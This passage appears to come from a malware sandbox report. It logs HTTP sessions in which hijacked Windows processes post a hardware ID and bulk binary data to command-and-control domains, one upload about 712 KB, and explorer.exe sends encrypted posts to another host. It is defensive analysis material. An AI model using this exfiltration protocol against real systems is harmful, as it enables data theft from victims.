                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:07.545450926 CEST4942INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:07 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=te129p9p5ac7crjb3kbb1mqhe9; expires=Sat, 27 Jan 2024 09:49:46 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:07 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t4z8C%2BNGP8nMo3r%2BEDueDsQZU33R6d8Nn3Cxo%2F5PpLGq%2BdN%2BfZ0%2BS9ndM4JlOSUpLr4TICUEpDWvd11EQOUDwZzN0YaiGVHUkWM%2FYfk21MELwv8HAW0z9aCHP9kdDSh1ahDwcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669d1c8023ae2-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:07.545468092 CEST4942INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        74192.168.2.349895104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:07.676731110 CEST4943OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:03:07.677364111 CEST4944OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:08.014250994 CEST4946INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:07 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=4dfhg4rsf4ieqn8mo5eagso1r5; expires=Sat, 27 Jan 2024 09:49:46 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:07 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Oa64iF9OhSXcrZm1JKPFM3O8opwv9U0nFgP4i1PgjUM4QnnioQ1%2BdgV9hO%2Bn4qOGewu7oqjMd6omAHpiIL7s0vM9lrv%2BX5rpCcNlNGszLR2Eh6x6ywZy5JUD4zgEhDY3gprLpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669d53e775716-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:08.014266968 CEST4946INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        75192.168.2.349896172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:07.772003889 CEST4944OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:07.772453070 CEST4945OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:08.159070015 CEST4948INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:08 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=cj1bjsggh9uuta6k3e91lsj1qa; expires=Sat, 27 Jan 2024 09:49:46 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:07 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=noz%2FcZ%2FXdjlPawMYrHZqNlNyBpRgOaG%2FwnDZ6z4D%2B2KMM8531c40gbiQL%2BIsvIokzaLsz8sHqfEYTCY6KmxcoRV44DI5a4zqMsvDoRRboQxdcY73LLpthU9iZ4j2sYqXgFHNuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669d5ced557ac-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:08.159082890 CEST4948INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        76192.168.2.349897172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:08.218477011 CEST4948OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:03:08.218785048 CEST4949OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:08.654026985 CEST4951INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:08 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=uncf5ubr9336modpum8o2a7he0; expires=Sat, 27 Jan 2024 09:49:47 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:08 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F4TKtzqwf62ts9RhWmCJsaK0jYqU1oy5NcZxqzsq44hQJP9upO%2BPaqrt87YWoHOyQmIxCdoYyxIKrctxdkMKZPKQ1WP6dcXqdFpL0fSO6XBzoubX3uwSqBA%2FwUCncGqVd0TLCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669d89c4e81cf-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:08.654253006 CEST4951INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        77192.168.2.349898172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:08.379921913 CEST4950OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:08.380409002 CEST4950OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:08.759855032 CEST4953INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:08 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=7goq3itktfmltus8sf1mr7s3ur; expires=Sat, 27 Jan 2024 09:49:47 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:08 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EQnYmUzU24rtxQWsSI1tebw7m8fo3T7i%2F74q%2FFNy44dqMqcGbK6EVOKBMh4AeEcRyleUoofJW0jkskcAoPp6LRtbYp9XvUad4X63gzp4Ypc6p5bQbStZgPib2lEVYPjDh5H4%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669d99fa93b62-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:08.759932041 CEST4953INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        78192.168.2.349899104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:08.988579035 CEST4954OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:08.990252972 CEST4954OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:09.362690926 CEST5041INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:09 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=r5rei7sthtebtsntj5pk3n71os; expires=Sat, 27 Jan 2024 09:49:48 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:09 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hZNeiLSNFWK9Gwo48o0Ti2RAzYTeNuXY9VPJSR6feUfH7%2B93LexnCPhMRWXO8jphTibrYqR5OoA820BHzhLPnlS%2BVqo2QReqpXsNn9SPkfdHF%2B3doIqiGJvQgfXXHRNuhcf8fA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669dd6a5a5b3a-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:09.362704992 CEST5041INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        79192.168.2.349900104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:09.092813969 CEST4955OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 712299
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:03:09.094640017 CEST4966OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:09.187686920 CEST4967OUTData Raw: ff 41 58 6e d3 da 55 ee 9e 7b 3a fc 08 eb 61 86 a9 cb 1d 7b e4 61 3d 7c 47 ca 58 ba 3f 36 66 d3 59 fd 7f d1 df dd 77 df bd 21 7b d3 32 32 4d ff 30 16 a0 d6 a5 9a 3d e1 7b 3f 0e 18 a2 fe 09 a3 94 fd 87 be d7 6f 7d d3 1b c2 d8 80 f2 5d 3e bb f5 fe
                                                                                                        Data Ascii: AXnU{:a{a=|GX?6fYw!{22M0={?o}]>]\F>r_"Njp?]F|gzjaP^<}isw15\|/g,;.hwF.XqydgE9S.:d:v+jU
                                                                                                        Oct 3, 2023 18:03:09.189228058 CEST4973OUTData Raw: 75 7f 3c 2d 31 1d f8 1f c7 fc 43 5f 60 de cf b8 bf 99 eb e9 f6 eb 71 63 c6 87 dc 8e b5 9e c8 81 7d 9a 49 8b 35 5a 3a 4b 66 86 38 7d 69 d4 3e d6 ff b1 ae b6 c8 f5 8f d7 52 1a 03 8c af df 88 ed 71 ec 51 d6 04 72 de 0f be e7 32 83 e3 7b 3b eb f6 ac
                                                                                                        Data Ascii: u<-1C_`qc}I5Z:Kf8}i>RqQr2{;{?r;,E] c~_^eS]_e!sCZVb*Xy!btjam+_[Z9f|rt#XR|&l]e\s&
                                                                                                        Oct 3, 2023 18:03:09.189378977 CEST4983OUTData Raw: ec b7 ca 4c 0c a7 33 ff 52 0d 20 fb ea b2 06 30 d6 ec 81 9f 2f ea fd d4 df 97 fd 83 b1 2e 66 87 cb 22 f6 28 1a 3f cc f7 81 bf 95 ff ad f4 30 4e 3c 2e a8 dd 8c 59 30 e4 eb 65 56 8a 75 65 c5 12 e4 bc d0 3e 4d 20 f3 41 2b 76 a0 2f 27 b6 e5 bf 9b f7
                                                                                                        Data Ascii: L3R 0/.f"(?0N<.Y0eVue>M A+v/'r90Wy,fq;][ 2Cfz9gVvO{O"g'r^Xx@Nj<8:6\6bEq`yY,Wp}oY{Lx/
                                                                                                        Oct 3, 2023 18:03:09.189481974 CEST4988OUTData Raw: c6 54 b3 91 ff f9 18 a0 55 47 cb ff ca 71 99 ba 78 5f cb ff 66 36 ff 3b 6e 97 d1 e2 7f 5b 03 ce 67 f1 bf ac fb cc 21 0d 59 d3 fc 2f cd 42 06 58 e2 19 58 96 ff 59 cf c1 bc fc 0f a7 0d 2b ff eb 5d 77 3d fc 2f b5 3f b6 a2 9a 85 eb c8 61 2d ff ab d8
                                                                                                        Data Ascii: TUGqx_f6;n[g!Y/BXXY+]w=/?a-e-k8$+rL*)kua77hwogo-k_Y28`e!K+:oFFWN?kA15k>Mgc=xu5pE?/.
                                                                                                        Oct 3, 2023 18:03:09.189554930 CEST4991OUTData Raw: 5a d5 fd 33 db f8 5f 4f d9 21 d4 da b5 fc 6f e6 f0 bf 51 e9 d7 15 d9 86 b2 f1 7f 5b fe d7 f2 bf 96 ff 35 c4 ff 94 c7 21 eb 43 fe e7 63 60 54 3e 6f de 90 58 67 b8 a9 38 ff 4a d8 e6 b1 c1 5a 81 b6 e6 66 9a 25 f9 5f 21 2d 60 0e fe 97 c7 46 9e ff 55
                                                                                                        Data Ascii: Z3_O!oQ[5!Cc`T>oXg8JZf%_!-`FUac|YY_o9C*>y_V% -?#1C9f+;&eI1Nm456.uQo6-yDo[L_Rd~Z-:
                                                                                                        Oct 3, 2023 18:03:09.282823086 CEST4993OUTData Raw: fc cf 77 3d e4 bd 9e 06 cd e4 aa fa ea 97 c9 99 72 42 c0 fd 4e a8 8b ff ed 12 59 45 3f e1 61 e1 7f 45 d8 df 8c e0 7f 15 6d d0 fc 2f cc 01 9c 62 07 ad cc b0 92 ec ae 2e 86 58 37 ff cb f2 f7 2d d4 37 5f 5d dc ff b7 e5 7f cd ea ff 90 f3 89 d6 6d 7e
                                                                                                        Data Ascii: w=rBNYE?aEm/b.X7-7_]m~tgm~C]YMX>='*$tU;/:!oe{UMrC(wQ{w o3C$IFh'';Jy;;a^NeqLs#d|apHE
                                                                                                        Oct 3, 2023 18:03:09.284216881 CEST4998OUTData Raw: 9f 65 59 39 3a b2 da 5f d5 f4 de e5 33 eb 9e 25 f7 35 b5 aa 7c f0 e8 e0 3d 4a 56 ee 10 f6 1f b6 e6 59 cf 27 79 0e 1d b5 b3 ff 53 cc ca 19 9f d7 ba 0c b3 f7 33 f3 5d 5c 5d ef 0f 33 f8 46 fc db f3 7e b4 72 1f ac 28 2f 29 68 85 58 5e 03 c6 eb de b2
                                                                                                        Data Ascii: eY9:_3%5|=JVY'yS3]\]3F~r(/)hX^k,o?b;+uRWF{fe+#{&VOh<?/E(LMX^t2ki2MR~'&57|2Vy5-t8]%?e>smXvmcq
                                                                                                        Oct 3, 2023 18:03:09.284290075 CEST5001OUTData Raw: ac ec 79 ac 9a 58 df fe b5 78 9f c4 fa c4 78 9f 62 55 f9 82 c5 6e 3e 10 b0 3f 4b 03 28 0c f0 7d c1 ef 37 5c ff 9b 88 ff dd e9 9e 1f f2 bf 7b 66 2d ff bb 3c e6 7f 0f 92 75 d8 9f e8 fd 90 ed dd b4 7d 7f f7 cb ab 2f 08 99 20 9a 4c 93 79 58 f6 d6 cf
                                                                                                        Data Ascii: yXxxbUn>?K(}7\{f-<u}/ LyXzVw{-keGY'c?pf-0LEyBZW01MdcCiy8,/!l</M7+cU_B8/P5
                                                                                                        Oct 3, 2023 18:03:09.284413099 CEST5011OUTData Raw: 96 29 1b 77 ae e5 7f fd 31 3e 0f 99 01 e6 dd bf 65 f7 7f 95 63 95 ab ce 28 8f 48 1e 33 39 20 e5 1f 89 63 03 d2 fd d7 d4 02 86 cf 8f f1 54 6b 9c ff 05 cf bd e3 d6 fb b9 51 fc dc ad 39 7f 97 9a 70 3f 34 9f 0e d0 c7 ff 06 c5 00 5b fe 17 59 c5 f6 d7
                                                                                                        Data Ascii: )w1>ec(H39 cTkQ9p?4[Y5M|#T0/'OrH_Q.G7mdfj;O|i=oHOXKX0qM1WU,
                                                                                                        Oct 3, 2023 18:03:12.056294918 CEST5802INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:11 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=v0291ulpon8srea1bpuilhu20o; expires=Sat, 27 Jan 2024 09:49:50 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:11 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I8SX8jumTwir811jvZ%2F1iemJUdTQVoDyaeV9NfLYkykZpLTK%2FbMqfUpW6KcINEttsCVEX%2Fzj7flIojoqPMQ4GJ4k3HjQNJIr1VS8IX9JnfwD7QOtygxUkl1TMivJLO55JODgLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669de0a100813-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:12.056355953 CEST5802INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        8192.168.2.349824211.40.39.25180C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:31.161660910 CEST318OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://pyecln.com/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 119
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:02:31.161704063 CEST319OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 3b 20 cb a6
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA -[k,vu; QwwloCB"=P!e
                                                                                                        Oct 3, 2023 18:02:32.259176016 CEST319INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:02:31 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 331
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
